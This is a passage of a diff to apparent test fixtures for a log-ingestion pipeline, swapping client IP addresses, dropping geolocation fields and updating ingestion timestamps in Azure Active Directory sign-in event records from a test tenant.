Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970293300Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -5870,25 +5105,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5902,7 +5119,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Success", @@ -5952,7 +5169,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -5964,12 +5181,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051662700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970297Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6008,25 +5225,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6040,7 +5239,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -6078,7 +5277,7 @@ }, "related": { "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -6090,12 +5289,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051666100Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970301400Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6131,25 +5330,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6163,7 +5344,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -6213,7 +5394,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -6225,12 +5406,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051671500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970307100Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6269,25 +5450,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6301,7 +5464,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -6351,7 +5514,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -6363,12 +5526,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051674500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970311Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6407,25 +5570,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6439,7 +5584,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -6489,7 +5634,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -6501,12 +5646,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051678200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970314900Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6545,25 +5690,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6577,7 +5704,7 @@ "ObjectId": "00000004-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -6627,7 +5754,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -6639,12 +5766,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051681Z", - "original": 